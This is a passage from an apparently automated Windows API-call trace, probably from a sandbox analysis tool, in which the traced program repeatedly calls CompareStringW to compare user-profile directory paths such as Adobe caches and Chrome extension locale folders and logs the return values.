lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount1=34, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\", cchCount2=57) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\", cchCount2=57) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\", cchCount2=57) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\", cchCount2=57) returned 3 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount2=118) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount2=118) returned 3 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount2=118) returned 3 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount2=118) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount2=118) returned 2 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Recovery\\WindowsRE\\", cchCount2=22) returned 3 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount1=34, lpString2="C:\\Recovery\\WindowsRE\\", cchCount2=22) returned 3 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\MF\\", cchCount1=32, lpString2="C:\\Recovery\\WindowsRE\\", cchCount2=22) returned 3 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\Recovery\\WindowsRE\\", cchCount2=22) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount1=79, lpString2="C:\\Recovery\\WindowsRE\\", cchCount2=22) returned 3 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\", cchCount2=53) returned 3 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\", cchCount1=47, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\", cchCount2=53) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount1=59, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\", cchCount2=53) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\", cchCount2=53) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\", cchCount1=57, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\", cchCount2=53) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\", cchCount2=133) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\", cchCount2=133) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\", cchCount2=133) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\", cchCount2=133) returned 3 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\", cchCount2=133) returned 3 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount2=128) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount2=128) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount2=128) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount2=128) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount2=128) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\", cchCount2=130) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\", cchCount2=130) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\", cchCount2=130) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\", cchCount2=130) returned 3 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\", cchCount2=130) returned 3 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\", cchCount2=133) returned 3 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", cchCount2=130) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", cchCount2=130) returned 3 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", cchCount2=130) returned 3 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", cchCount2=130) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\", cchCount2=130) returned 3 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\", cchCount1=57, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 2 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\", cchCount2=131) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\", cchCount2=131) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\", cchCount2=131) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\", cchCount2=131) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\", cchCount2=131) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\", cchCount2=130) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\", cchCount2=130) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\", cchCount2=130) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\", cchCount2=130) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\", cchCount2=130) returned 3 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\", cchCount2=130) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\", cchCount2=130) returned 3 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\", cchCount2=130) returned 3 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\", cchCount2=130) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\", cchCount2=130) returned 3 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\", cchCount1=57, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 2 [0271.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\", cchCount1=133, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0271.256] CompareStringW 